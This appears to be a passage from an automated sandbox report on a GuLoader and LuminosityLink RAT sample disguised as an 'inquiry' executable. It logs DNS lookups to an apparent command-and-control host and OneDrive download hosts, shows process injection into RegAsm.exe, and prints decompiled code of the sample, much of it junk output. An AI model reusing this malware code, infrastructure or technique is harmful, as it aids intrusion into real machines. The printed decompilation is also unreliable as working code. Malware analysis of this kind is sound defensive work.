                                Sep 17, 2020 09:17:55.077337027 CEST192.168.0.801.1.1.10x9167Standard query (0)nobawi.dvrdns.orgA (IP address)IN (0x0001)
                                Sep 17, 2020 09:18:02.650759935 CEST192.168.0.801.1.1.10x4bb2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                Sep 17, 2020 09:18:03.276026011 CEST192.168.0.801.1.1.10x73eaStandard query (0)eaup2w.sn.files.1drv.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Sep 17, 2020 09:17:29.695420980 CEST1.1.1.1192.168.0.800x196bNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Sep 17, 2020 09:17:30.530215025 CEST1.1.1.1192.168.0.800x5ee6No error (0)eaup2w.sn.files.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Sep 17, 2020 09:17:35.647110939 CEST1.1.1.1192.168.0.800x56aaNo error (0)nobawi.dvrdns.org194.5.97.46A (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:45.373910904 CEST1.1.1.1192.168.0.800x4529No error (0)nobawi.dvrdns.org194.5.97.46A (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:48.767934084 CEST1.1.1.1192.168.0.800x4adbNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Sep 17, 2020 09:17:49.516685009 CEST1.1.1.1192.168.0.800x83c6No error (0)eaup2w.sn.files.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Sep 17, 2020 09:17:49.824954987 CEST1.1.1.1192.168.0.800xfc10No error (0)nobawi.dvrdns.org194.5.97.46A (IP address)IN (0x0001)
                                Sep 17, 2020 09:17:55.087174892 CEST1.1.1.1192.168.0.800x9167No error (0)nobawi.dvrdns.org194.5.97.46A (IP address)IN (0x0001)
                                Sep 17, 2020 09:18:02.655469894 CEST1.1.1.1192.168.0.800x4bb2No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Sep 17, 2020 09:18:03.287719965 CEST1.1.1.1192.168.0.800x73eaNo error (0)eaup2w.sn.files.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: New Inquiry 903838737777721102029393003938.exe PID: 6652 Parent PID: 3968

                                General

                                Start time:09:15:53
                                Start date:17/09/2020
                                Path:C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
                                Imagebase:0x400000
                                File size:77824 bytes
                                MD5 hash:01A54F73856CFB74A3BBBA47BCEC227B
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Reputation:low

                                Chronological Activities

                                Analysis Process: RegAsm.exe PID: 1576 Parent PID: 6652

                                General

                                Start time:09:17:25
                                Start date:17/09/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
                                Imagebase:0xb0000
                                File size:53248 bytes
                                MD5 hash:6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Chronological Activities

                                Analysis Process: RegAsm.exe PID: 1440 Parent PID: 6652

                                General

                                Start time:09:17:25
                                Start date:17/09/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
                                Imagebase:0xae0000
                                File size:53248 bytes
                                MD5 hash:6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_LuminosityLink, Description: Yara detected LuminosityLink RAT, Source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 1584 Parent PID: 1440

                                General

                                Start time:09:17:26
                                Start date:17/09/2020
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b6340000
                                File size:822272 bytes
                                MD5 hash:C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: anibtcent.exe.exe PID: 4188 Parent PID: 1440

                                General

                                Start time:09:17:34
                                Start date:17/09/2020
                                Path:C:\ProgramData\782401\anibtcent.exe.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\ProgramData\782401\anibtcent.exe.exe'
                                Imagebase:0x850000
                                File size:53248 bytes
                                MD5 hash:6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Antivirus matches:
                                • Detection: 0%, Virustotal, Browse
                                • Detection: 0%, Metadefender, Browse
                                • Detection: 0%, ReversingLabs
                                Reputation:low

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 1500 Parent PID: 4188

                                General

                                Start time:09:17:35
                                Start date:17/09/2020
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b6340000
                                File size:822272 bytes
                                MD5 hash:C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: demisphereklediskene.exe PID: 1812 Parent PID: 4560

                                General

                                Start time:09:17:39
                                Start date:17/09/2020
                                Path:C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
                                Imagebase:0x400000
                                File size:77824 bytes
                                MD5 hash:01A54F73856CFB74A3BBBA47BCEC227B
                                Has administrator privileges:false
                                Programmed in:Visual Basic
                                Antivirus matches:
                                • Detection: 21%, Virustotal, Browse
                                • Detection: 19%, ReversingLabs
                                Reputation:low

                                Chronological Activities

                                Analysis Process: RegAsm.exe PID: 4328 Parent PID: 1812

                                General

                                Start time:09:17:43
                                Start date:17/09/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
                                Imagebase:0x860000
                                File size:53248 bytes
                                MD5 hash:6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges:false
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 4084 Parent PID: 4328

                                General

                                Start time:09:17:43
                                Start date:17/09/2020
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b6340000
                                File size:822272 bytes
                                MD5 hash:C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: RegAsm.exe PID: 2652 Parent PID: 4560

                                General

                                Start time:09:17:47
                                Start date:17/09/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe'
                                Imagebase:0x330000
                                File size:53248 bytes
                                MD5 hash:6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges:false
                                Programmed in:.Net C# or VB.NET
                                Reputation:low

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 5952 Parent PID: 2652

                                General

                                Start time:09:17:48
                                Start date:17/09/2020
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b6340000
                                File size:822272 bytes
                                MD5 hash:C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: demisphereklediskene.exe PID: 2140 Parent PID: 4560

                                General

                                Start time:09:17:55
                                Start date:17/09/2020
                                Path:C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
                                Imagebase:0x400000
                                File size:77824 bytes
                                MD5 hash:01A54F73856CFB74A3BBBA47BCEC227B
                                Has administrator privileges:false
                                Programmed in:Visual Basic
                                Reputation:low

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: New Inquiry 903838737777721102029393003938.exe PID: 6652 Parent PID: 3968 New Inquiry 903838737777721102029393003938.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:2.9%
                                  Dynamic/Decrypted Code Coverage:8.7%
                                  Signature Coverage:0%
                                  Total number of Nodes:23
                                  Total number of Limit Nodes:5

                                  Graph

                                  execution_graph 421 410765 __vbaFreeStr __vbaFreeObj __vbaFreeVar 397 4105e4 __vbaChkstk 398 41062e 397->398 399 410637 __vbaNew2 398->399 400 41064f 398->400 399->400 401 410678 __vbaHresultCheckObj 400->401 402 41068f 400->402 401->402 403 4106b3 __vbaHresultCheckObj 402->403 404 4106ca 402->404 405 4106ce __vbaStrMove __vbaFreeObj 403->405 404->405 406 4106fd 405->406 407 410722 406->407 408 410708 __vbaHresultCheckObj 406->408 409 410726 __vbaLateIdCallLd __vbaI4Var __vbaFreeObj __vbaFreeVar 407->409 408->409 413 4107ae __vbaChkstk 409->413 411 410757 __vbaFreeStr __vbaFreeStr 414 4107e4 __vbaNew2 413->414 415 4107fc 413->415 414->415 416 410840 415->416 417 410826 __vbaHresultCheckObj 415->417 418 410849 __vbaFreeStr 416->418 417->416 418->411 419 401198 #100 420 4011b8 419->420

                                  Executed Functions

                                  Function 004105E4, Relevance: 19.6, APIs: 13, Instructions: 123UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 60%
                                  			E004105E4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v44;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _t78;
				signed int _t83;
				signed int _t88;
				char* _t89;
				void* _t90;
				void* _t101;
				void* _t103;
				intOrPtr _t104;

				_t100 = __esi;
				_t99 = __edi;
				_t91 = __ebx;
				_t104 = _t103 - 0xc;
				 *[fs:0x0] = _t104;
				L004010C0();
				_v16 = _t104;
				_v12 = E00401098;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x4010c6, _t101);
				if( *0x411594 != 0) {
					_v92 = 0x411594;
				} else {
					_push(0x411594);
					_push(0x402090);
					L00401174();
					_v92 = 0x411594;
				}
				_v64 =  *_v92;
				_t78 =  *((intOrPtr*)( *_v64 + 0x14))(_v64,  &_v44);
				asm("fclex");
				_v68 = _t78;
				if(_v68 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x402080);
					_push(_v64);
					_push(_v68);
					L0040116E();
					_v96 = _t78;
				}
				_v72 = _v44;
				_t83 =  *((intOrPtr*)( *_v72 + 0x60))(_v72,  &_v40);
				asm("fclex");
				_v76 = _t83;
				if(_v76 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x4020a0);
					_push(_v72);
					_push(_v76);
					L0040116E();
					_v100 = _t83;
				}
				_v88 = _v40;
				_v40 = _v40 & 0x00000000;
				L0040117A();
				L00401168();
				_t88 =  *((intOrPtr*)( *_a4 + 0x288))(_a4,  &_v44);
				asm("fclex");
				_v64 = _t88;
				if(_v64 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x288);
					_push(0x401f54);
					_push(_a4);
					_push(_v64);
					L0040116E();
					_v104 = _t88;
				}
				_push(0);
				_push(0);
				_push(_v44);
				_t89 =  &_v60;
				_push(_t89);
				L0040115C();
				_push(_t89);
				L00401162();
				_v36 = _t89;
				L00401168();
				L00401156(); // executed
				_t90 = E004107AE(_t91,  &_v60, _t99, _t100); // executed
				_v8 = 0;
				_push(E0041078F);
				L00401150();
				L00401150();
				return _t90;
			}





























                                  0x004105e4
                                  0x004105e4
                                  0x004105e4
                                  0x004105e7
                                  0x004105f6
                                  0x00410600
                                  0x00410608
                                  0x0041060b
                                  0x00410618
                                  0x00410620
                                  0x0041062b
                                  0x00410635
                                  0x0041064f
                                  0x00410637
                                  0x00410637
                                  0x0041063c
                                  0x00410641
                                  0x00410646
                                  0x00410646
                                  0x0041065b
                                  0x0041066a
                                  0x0041066d
                                  0x0041066f
                                  0x00410676
                                  0x0041068f
                                  0x00410678
                                  0x00410678
                                  0x0041067a
                                  0x0041067f
                                  0x00410682
                                  0x00410685
                                  0x0041068a
                                  0x0041068a
                                  0x00410696
                                  0x004106a5
                                  0x004106a8
                                  0x004106aa
                                  0x004106b1
                                  0x004106ca
                                  0x004106b3
                                  0x004106b3
                                  0x004106b5
                                  0x004106ba
                                  0x004106bd
                                  0x004106c0
                                  0x004106c5
                                  0x004106c5
                                  0x004106d1
                                  0x004106d4
                                  0x004106de
                                  0x004106e6
                                  0x004106f7
                                  0x004106fd
                                  0x004106ff
                                  0x00410706
                                  0x00410722
                                  0x00410708
                                  0x00410708
                                  0x0041070d
                                  0x00410712
                                  0x00410715
                                  0x00410718
                                  0x0041071d
                                  0x0041071d
                                  0x00410726
                                  0x00410728
                                  0x0041072a
                                  0x0041072d
                                  0x00410730
                                  0x00410731
                                  0x00410739
                                  0x0041073a
                                  0x0041073f
                                  0x00410745
                                  0x0041074d
                                  0x00410752
                                  0x00410757
                                  0x0041075e
                                  0x00410781
                                  0x00410789
                                  0x0041078e

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004010C6), ref: 00410600
                                  • __vbaNew2.MSVBVM60(00402090,00411594,?,?,?,?,004010C6), ref: 00410641
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402080,00000014), ref: 00410685
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004020A0,00000060), ref: 004106C0
                                  • __vbaStrMove.MSVBVM60(00000000,?,004020A0,00000060), ref: 004106DE
                                  • __vbaFreeObj.MSVBVM60(00000000,?,004020A0,00000060), ref: 004106E6
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401098,00401F54,00000288), ref: 00410718
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00410731
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004010C6), ref: 0041073A
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004010C6), ref: 00410745
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004010C6), ref: 0041074D
                                  • __vbaFreeStr.MSVBVM60(0041078F,00000000,?,?,?,004010C6), ref: 00410781
                                  • __vbaFreeStr.MSVBVM60(0041078F,00000000,?,?,?,004010C6), ref: 00410789
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24036576698.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.24036522568.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000003.00000002.24036687091.0000000000411000.00000004.00020000.sdmp Download File
                                  • Associated: 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID: __vba$Free$CheckHresult$CallChkstkLateMoveNew2
                                  • String ID:
                                  • API String ID: 1245641248-0
                                  • Opcode ID: 9a465e81a76bde142842b4f258309277150979447a63d957fb85e618464083e3
                                  • Instruction ID: 872232f5f29706813e3bb7c0173e2787999fc991f4768f39e88a0e5453f75b58
                                  • Opcode Fuzzy Hash: 9a465e81a76bde142842b4f258309277150979447a63d957fb85e618464083e3
                                  • Instruction Fuzzy Hash: F651C275900208EFCB14EFA5C949BDDBBB5AF08704F10402AF205BB2A1D779A995DF58
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00401198, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 20 401198-4011b6 #100 21 401201 20->21 22 4011b8 20->22
                                  C-Code - Quality: 84%
                                  			_entry_(signed int __eax, signed int __ebx, intOrPtr* __ecx, intOrPtr* __edx, intOrPtr* __edi, signed int __esi, intOrPtr* _a4, intOrPtr _a68, signed int _a110) {
				intOrPtr _v8;
				signed int _v28;
				void* _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v88;
				signed int* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr* _t232;
				intOrPtr* _t233;
				signed char _t234;
				signed char _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr* _t238;
				intOrPtr* _t239;
				intOrPtr* _t240;
				intOrPtr* _t241;
				intOrPtr* _t242;
				void* _t243;
				intOrPtr* _t244;
				intOrPtr* _t245;
				signed int _t246;
				intOrPtr* _t247;
				intOrPtr* _t248;
				signed int _t249;
				signed char _t250;
				signed char _t252;
				intOrPtr* _t254;
				intOrPtr* _t255;
				signed char _t256;
				signed int _t257;
				intOrPtr* _t259;
				intOrPtr* _t260;
				intOrPtr* _t261;
				signed char _t263;
				intOrPtr* _t264;
				intOrPtr* _t265;
				void* _t267;
				signed char _t268;
				intOrPtr* _t270;
				intOrPtr* _t271;
				intOrPtr* _t272;
				signed int _t273;
				intOrPtr* _t276;
				intOrPtr* _t277;
				intOrPtr* _t278;
				intOrPtr* _t280;
				intOrPtr* _t281;
				intOrPtr* _t282;
				signed char _t284;
				signed char _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				intOrPtr* _t288;
				intOrPtr* _t290;
				intOrPtr* _t291;
				void* _t292;
				void* _t293;
				intOrPtr* _t294;
				void* _t295;
				void* _t296;
				intOrPtr* _t297;
				intOrPtr* _t298;
				signed int _t313;
				signed int _t318;
				signed int _t323;
				char* _t324;
				void* _t325;
				intOrPtr* _t326;
				intOrPtr* _t327;
				intOrPtr* _t328;
				signed char _t329;
				signed char _t330;
				intOrPtr* _t333;
				intOrPtr* _t334;
				void* _t335;
				intOrPtr* _t337;
				signed int _t338;
				signed char _t340;
				signed int _t341;
				intOrPtr* _t342;
				signed char _t344;
				intOrPtr* _t345;
				intOrPtr* _t347;
				signed int _t351;
				void* _t354;
				signed int _t356;
				signed int _t358;
				signed char _t359;
				void* _t360;
				intOrPtr* _t361;
				void* _t362;
				intOrPtr* _t363;
				intOrPtr* _t364;
				intOrPtr* _t365;
				signed char _t366;
				signed char _t367;
				intOrPtr* _t368;
				intOrPtr* _t369;
				void* _t376;
				intOrPtr* _t377;
				signed int* _t379;
				signed int* _t385;
				signed int _t386;
				signed int _t387;
				void* _t389;
				void* _t391;
				signed int* _t392;
				void* _t393;
				void* _t394;
				intOrPtr _t395;
				void* _t398;
				intOrPtr _t399;

				_t386 = __esi;
				_t378 = __edx;
				_t361 = __ecx;
				_push("VB5!6&*"); // executed
				L00401192(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t232 = __eax - 1;
				 *_t232 =  *_t232 + _t232;
				 *_t232 =  *_t232 + _t232;
				 *_t232 =  *_t232 + _t232;
				 *__edi =  *__edi + __ecx;
				_t399 =  *__edi;
				asm("bswap esi");
				if(_t399 <= 0) {
					asm("pushad");
					asm("invalid");
					asm("salc");
					__eflags =  *((char*)(__ebx + _t389)) - 0x17;
					__eflags = _t232 - 0x2b;
					_pop(ss);
					asm("in eax, 0xba");
					asm("adc cl, [edi-0x2f]");
					asm("out dx, al");
					asm("ror byte [0x3a17e6d3], cl");
					_t385 = __edi - 1;
					asm("lodsd");
					_t233 = _t232;
					asm("stosb");
					 *((intOrPtr*)(_t233 - 0x2d)) =  *((intOrPtr*)(_t233 - 0x2d)) + _t233;
					_t234 = __ebx ^  *(__ecx - 0x48ee309a);
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					 *_t234 =  *_t234 + _t234;
					goto 0;
					 *_t234 =  *_t234 + _t234;
					_t235 = _t234 |  *_t234;
					_t351 = _t233 - 1;
					__eflags = _t351;
					asm("popad");
					if(_t351 < 0) {
						L9:
						_pop(es);
						_t20 =  &(_t385[0x1c]);
						 *_t20 = _t385[0x1c] + _t361;
						__eflags =  *_t20;
						if( *_t20 == 0) {
							goto L18;
						} else {
							asm("outsd");
							asm("outsb");
							_t337 = (_t235 ^  *_t235) + 0xe100438;
							_t385 = 0x1201ef04;
							 *_t337 =  *_t337 + _t337;
							 *_t351 =  *_t351 + 1;
							 *_t337 =  *_t337 - _t337;
							 *_t337 =  *_t337 + _t337;
							_t236 = _t337 +  *0x1201ef04;
							 *0x1201EF74 =  *0x1201EF74 + _t361;
							__eflags =  *0x1201EF74;
							if( *0x1201EF74 == 0) {
								goto L20;
							} else {
								asm("outsd");
								asm("outsb");
								 *_t236 =  *_t236 ^ _t236;
								_push(es);
								 *0x1201ef04 =  *0x1201ef04 + _t236;
								 *0x1201EF74 =  *0x1201EF74 + _t361;
								__eflags =  *0x1201EF74;
								if( *0x1201EF74 != 0) {
									asm("outsd");
									asm("outsb");
									 *_t236 =  *_t236 ^ _t236;
									_t338 = _t236 + 0xd980960;
									__eflags = _t338;
									_t385 = 0x1201ef04;
									goto L13;
								}
							}
						}
					} else {
						asm("outsd");
						asm("o16 gs insb");
						 *_t235 =  *_t235 ^ _t235;
						_t338 = _t235 | 0x55000701;
						_t398 = _t391 + 1;
						_t360 = _t351 - 1;
						_push(__edx);
						_pop(_t377);
						_push(_t360);
						_push(_t398);
						 *_t377 =  *_t377 + _t360;
						 *_t338 =  *_t338 + _t338;
						_t378 = __edx + 1;
						 *((intOrPtr*)(_t385 + _t338)) =  *((intOrPtr*)(_t385 + _t338)) + _t338;
						_a68 = _a68 + _t378;
						_t351 = _t360 - 1;
						_t361 = _t378;
						_push(_t351);
						_push(_t398);
						 *0x1aca =  *0x1aca + _t378;
						asm("aad 0x1a");
						 *_t338 =  *_t338 + _t338;
						asm("movsb");
						asm("adc al, [eax]");
						 *((intOrPtr*)(_t351 + 0x12)) =  *((intOrPtr*)(_t351 + 0x12)) + _t338;
						 *_t338 =  *_t338 + _t338;
						_t391 = _t398 + 1;
						 *((intOrPtr*)(__esi + 3)) =  *((intOrPtr*)(__esi + 3)) + _t338;
						 *__ecx =  *__ecx + 1;
						 *_t338 =  *_t338 - _t338;
						 *_t338 =  *_t338 + _t338;
						 *_t385 =  *_t385 + _t338;
						_t14 =  &(_t385[0x1c]);
						 *_t14 = _t385[0x1c] + __ecx;
						__eflags =  *_t14;
						if( *_t14 == 0) {
							L13:
							asm("out dx, eax");
							 *_t378 =  *_t378 + _t378;
							 *_t351 =  *_t351 + 1;
							_t340 = _t338 +  *_t338 & 0x00000000;
							 *_t340 =  *_t340 + _t340;
							_t341 = _t340 + 5;
							__eflags = _t341;
							goto L14;
						} else {
							asm("outsd");
							asm("outsb");
							_t341 = _t338 ^  *_t338;
							_push(es);
							 *_t385 =  *_t385 + _t341;
							_t16 =  &(_t385[0x1c]);
							 *_t16 = _t385[0x1c] + __ecx;
							__eflags =  *_t16;
							if( *_t16 == 0) {
								L14:
								_t236 = 0x78655400 + _t341;
								__eflags = _t236;
								if(_t236 == 0) {
									goto L19;
								} else {
									 *_t378 =  *_t378 + _t236;
									_t342 = _t236 + 0x78;
									 *_t342 =  *_t342 + _t361;
									_t236 = _t342 + 0x01ef1167 |  *0x78655400;
									__eflags = _t236;
									if(_t236 != 0) {
										 *_t378 =  *_t378 + _t378;
										_t344 = _t236 +  *_t236;
										__eflags = _t344;
										goto L17;
									}
								}
								goto L21;
							} else {
								asm("outsd");
								asm("outsb");
								_t347 = (_t341 ^  *_t341) + 0xe880d98;
								_t385 = 0x1201ef04;
								 *_t347 =  *_t347 + _t347;
								 *_t351 =  *_t351 + 1;
								 *_t347 =  *_t347 - _t347;
								 *_t347 =  *_t347 + _t347;
								_t344 = _t347 +  *0x1201ef04;
								 *0x1201EF74 =  *0x1201EF74 + __ecx;
								__eflags =  *0x1201EF74;
								if( *0x1201EF74 == 0) {
									L17:
									_t351 = _t351 + _t351;
									_t345 = _t344 +  *((intOrPtr*)(_t344 + _t344));
									_push(es);
									 *_t345 =  *_t345 + _t345;
									 *((intOrPtr*)(_t345 + 0x21)) =  *((intOrPtr*)(_t345 + 0x21)) + _t345;
									_t235 = _t345 + 1;
									__eflags = _t235;
									L18:
									 *_t361 =  *_t361 + _t235;
									 *_t378 =  *_t378 + _t235;
									_t236 = _t235 + _t351;
									asm("sbb al, 0x40");
									 *_t236 =  *_t236 + _t236;
									 *_t236 =  *_t236 + _t236;
									_t351 = _t351 + _t351;
									asm("invalid");
									L19:
									asm("invalid");
									asm("invalid");
									asm("invalid");
									 *_t236 =  *_t236 + _t236;
									 *_t236 =  *_t236 + _t236;
									asm("sbb eax, 0x101c0040");
									L20:
									asm("sbb al, 0x10");
									_t361 = _t361 + 1;
									 *_t236 =  *_t236 + _t236;
									__eflags =  *_t236;
									L21:
									 *_t236 =  *_t236 + _t236;
									_t237 = _t236 + _t351;
									__eflags = _t237;
									asm("outsd");
									if (_t237 >= 0) goto L22;
								} else {
									asm("outsd");
									asm("outsb");
									_t235 = _t344 ^  *_t344;
									_push(es);
									 *0x1201ef04 =  *0x1201ef04 + _t235;
									__eflags =  *0x1201ef04;
									goto L9;
								}
							}
						}
					}
					 *_t237 =  *_t237 + _t237;
					 *_t237 =  *_t237 + _t237;
					 *_t237 =  *_t237 + _t237;
					 *_t237 =  *_t237 + _t237;
					 *_t237 =  *_t237 + _t237;
					 *_t237 =  *_t237 + _t237;
					__eflags =  *_t237;
					if( *_t237 != 0) {
						_t335 = _t237 + 1;
						 *_t361 =  *_t361 + _t335;
						 *_t351 =  *_t351 + _t335;
						_t237 = _t335 + _t351;
						asm("sbb al, 0x40");
						 *_t237 =  *_t237 + _t237;
						 *_t237 =  *_t237 + _t237;
						_t351 = _t351 + _t351;
						asm("invalid");
						asm("invalid");
					}
					asm("invalid");
					 *_t237 =  *_t237 + 1;
					 *_t237 =  *_t237 + _t237;
					_t238 = _t237 + _t237;
					asm("sbb eax, 0x10400040");
					_t362 = _t361 + 1;
					 *_t238 =  *_t238 + _t238;
					 *_t238 =  *_t238 + _t238;
					 *((intOrPtr*)(_t238 + 0x7e2a)) =  *((intOrPtr*)(_t238 + 0x7e2a)) + _t238;
					 *_t238 =  *_t238 + _t238;
					 *_t238 =  *_t238 + _t238;
					 *_t238 =  *_t238 + _t238;
					 *_t238 =  *_t238 + _t238;
					 *_t238 =  *_t238 + _t238;
					 *((intOrPtr*)(_t351 + _t378 + 0x10040)) =  *((intOrPtr*)(_t351 + _t378 + 0x10040)) + _t362;
					_t239 = _t238;
					asm("fcomp qword [eax+eax*2]");
					 *_t239 =  *_t239 + _t239;
					 *_t239 =  *_t239 + _t239;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t239 =  *_t239 + 1;
					 *_t239 =  *_t239 + _t239;
					_t240 = _t239 + _t378;
					asm("sbb eax, 0x10500040");
					_t363 = _t362 + 1;
					 *_t240 =  *_t240 + _t240;
					 *_t240 =  *_t240 + _t240;
					 *_t240 =  *_t240 + _t378;
					 *_t240 =  *_t240 + _t240;
